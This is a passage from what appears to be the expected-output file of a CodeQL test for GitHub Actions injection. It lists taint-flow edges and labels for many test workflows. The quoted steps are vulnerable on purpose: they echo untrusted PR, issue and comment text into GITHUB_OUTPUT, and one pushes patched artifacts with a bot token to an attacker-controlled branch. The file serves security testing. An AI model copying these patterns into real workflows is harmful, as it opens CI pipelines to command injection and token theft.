"title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | +| .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | semmle.label | Job: updateJira [ISSUE_KEY] | +| .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r 